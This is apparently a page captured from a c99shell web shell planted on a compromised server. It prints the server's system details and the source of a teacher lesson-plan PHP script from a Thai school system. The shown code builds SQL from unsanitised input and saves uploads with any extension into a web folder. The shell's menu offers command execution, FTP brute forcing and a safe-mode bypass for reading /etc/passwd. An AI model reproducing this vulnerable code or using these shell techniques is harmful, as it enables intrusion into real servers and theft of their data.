!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     InsertPlan.php (6.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    session_start
();

    
/** Set Timezone **/
    
date_default_timezone_set('Asia/Bangkok');
    
    
/**  Define Validate Access  */
    
define'_VALID_ACCESS');

    
/**  Check Session User Login  */
    
if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
        echo 
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo 
"<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo 
"<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    } 
    else {
        
/**  Configuration  */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
        require_once( 
"../include/Function.php" );
        require_once( 
"../include/FunctionDB.php" );
    
        
/**  Create Database Object  */
        
$dbObj = new DBConn;

        
//=== SESSION
        
$Username $valid_user
        
        
        
/**  Config Table for This Page  */
        
$myTable1 "personal_tb";
        
        
/**  Table  -->  personal_tb  */
        
$query1 " SELECT *  FROM $myTable1  WHERE Username='$Username' ";
        
$result1 $dbObj->execQuery($query1);
        
$rss $dbObj->fetchArray($result1);
        
        
$Teacher_code $_POST['Teacher_code'];
        
$Status $_POST['Status'];
        
$programId $_POST['programId'];

        
$courseId $_POST['courseId'];
        
//$conditionId1 = $_POST['conditionId1'];
        //$conditionId2 = $_POST['conditionId2'];

        
$Method_code $_POST['Method_code'];
        
$Place =  trim$_POST['Place'] );
        
$Course_code $_POST['courseCode'];
        
$courseName $_POST['courseName'];
        
$courseUnit $_POST['courseUnit'];
        
$Start_date =  trim$_POST['Start_date'] );
        
$Total_std $_POST['Total_std'];
        
$Total_hour $_POST['Total_hour'];
        
$Total_std $_POST['Total_std'];
        
//$Start_date = $_POST['mYear']."-".$_POST['mMonth']."-".$_POST['mDate'];  // วัน/เดือน/ปีที่เริ่ม
        
$Start_date dmyE2ymdE2($_REQUEST["mDate"]);
        
$Mainidea htmlspecialcharstrim$_POST['Mainidea'] ) );  // แนวคิดหลัก
        
$Objective htmlspecialcharstrim$_POST['Objective'] ) );  // เรื่องที่สอน
        
$Title_name htmlspecialcharstrim$_POST['Title_name'] ) );    // เรื่องที่สอน
        
        
        /*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
        
$Media =  htmlspecialcharstrim$_POST['Media'] ) );    //??? อยู่ตรงไหน 
        
$Appendix =  htmlspecialcharstrim$_POST['Appendix'] ) );  //??? อยู่ตรงไหน
        /*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
        
        
        
$Res_unit =  $_POST['Res_unit'];  // งานวิจัยในชั้นเรียน
        
$Apply =  $_POST['Apply'];  // นำผลงานวิจัยมาใช้ประโยชน์ ในงานวิจัยอื่น
        
        //---  วิธีการสอน
        
$M1 $_POST['M1'];         $M2 $_POST['M2'];         $M3 $_POST['M3'];         $M4 $_POST['M4'];         $M5 $_POST['M5'];
        
$M6 $_POST['M6'];         $M7 $_POST['M7'];         $M8 $_POST['M8'];         $M9 $_POST['M9'];         $M10 $_POST['M10'];
        
$M11 $_POST['M11'];         $M12 $_POST['M12'];         $M13 $_POST['M13'];         $M14 $_POST['M14'];
        
$M15 $_POST['M15'];         $M16 $_POST['M16'];         $M17 $_POST['M17'];         $M18 $_POST['M18'];
        
$M19 $_POST['M19'];         $M20 $_POST['M20'];         $M21 $_POST['M21'];         $M_else $_POST['M_else'];
        
$Else_desc $_POST['Else_desc'];
    
        
//---  คุณลักษณะแผนการสอน
        
$Sp1 $_POST['Sp1'];         $Sp2 $_POST['Sp2'];         $Sp3 $_POST['Sp3'];         $Sp4 $_POST['Sp4'];         $Sp5 $_POST['Sp5'];
        
$Sp6 $_POST['Sp6'];         $Sp7 $_POST['Sp7'];         $Sp8 $_POST['Sp8'];         $Sp9 $_POST['Sp9'];         $Sp10 $_POST['Sp10'];

        
//---  วิธีการวัดและประเมินผล
        
$Asses1 $_POST['Asses1'];
        
$Asses2 $_POST['Asses2'];
        
$Asses3 $_POST['Asses3'];
        
$Asses4 $_POST['Asses4'];
    
    
///----------///
    
$Path "../Plan_pic"
        
        
//---  Table  -->  'research_tb' 
        //###  Upload Image File
        
if( $_FILES['Filetex']['name'] != "" ) {
            
$Filetex date('YmdHis').strrchr($_FILES['Filetex']['name'], ".");
            
//$Filetex = $_FILES['Filetex']['name'];
            
@copy$_FILES['Filetex']['tmp_name'] , $PlanPicPath.$Filetex );
            @
unlink$_FILES['Filetex']['tmp_name'] );
        }
        
//---  Insert to DB
        //---  Table  -->  'tech_plan_tb'
        
InsertPlan$Teacher_code$acadYear$semester $programId $courseCode$Status $conditionId1 $conditionId2 $courseId $Start_date $Objective $Mainidea $Title_name $Total_hour $Total_std $Assess_code $Method_code $Place $Media $Appendix $Res_unit $Apply $Asses1 $Asses2 $Asses3 $Asses4 ,$Filetex );
     
        
$Plan_code mysql_insert_id();
     
         
//---  Table  -->  'techplan_method_tb'
        
InsertMTP$Plan_code $Teacher_code $courseId $M1 $M2 $M3 $M4 $M5 $M6 $M7 $M8 $M9 $M10 $M11 $M12 $M13 $M14 $M15 $M16 $M17 $M18 $M19 $M20 $M21 $M_else $Else_desc );
        
        
//---  Table  -->  'tech_spec_tb'
            
InsertSpt$Plan_code $Teacher_code $courseId $Sp1 $Sp2 $Sp3 $Sp4 $Sp5 $Sp6 $Sp7 $Sp8 $Sp9 $Sp10 );
        
    
    } 
# else

 
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="../js/utilities.js"></script>
<title>ข้อมูลทั่วไปบุคลากร - ข้อมูลแผนการสอน - เพิ่มข้อมูลแผนการสอน</title>
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<?php
    
include("../templates/incHeader.php");
?>
<table width="1003" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="203" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include("./_incMainMenu.php");?></td>
    <td width="800" height="440" align="center" valign="top" style="padding:10px 0px 5px 10px"><fieldset>
     <table width="780" border="0" cellspacing="0" cellpadding="0">
      <form id="myForm" name="myForm" method="post" action="">
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td style="padding-left:15px;"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>&raquo; <a href="Menu_Teach.php">ข้อมูลทั่วไปบุคลากร</a> &raquo; <a href="PlanList.php?Teacher_code=<?=$Teacher_code;?>">ข้อมูลแผนการสอน</a> &raquo; <span class="NOTE">เพิ่มข้อมูลแผนการสอน</span></strong></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td height="150" align="center"><span class="TEXT-GREEN10"><strong>ระบบจัดเก็บข้อมูลของท่านเรียบร้อยแล้ว</strong></span><br />
          กรุณารอส้กครู่ กำลังเปลี่ยนหน้าอัตโนมัติ<br />
          <?php echo "<meta http-equiv=\"refresh\" content=\"1; URL=PlanList.php?Teacher_code=$Teacher_code\">"?></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr></form>
    </table>
   </fieldset></td>
  </tr>
</table>
<?php include("../templates/incFooter.php"); ?>
</body>
</html>
<?php
    
/**  Free Resource */
    
$dbObj->freeresult($result1);
    
    
/**  Close the Database  */
    
$dbObj->disconn();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0084 ]--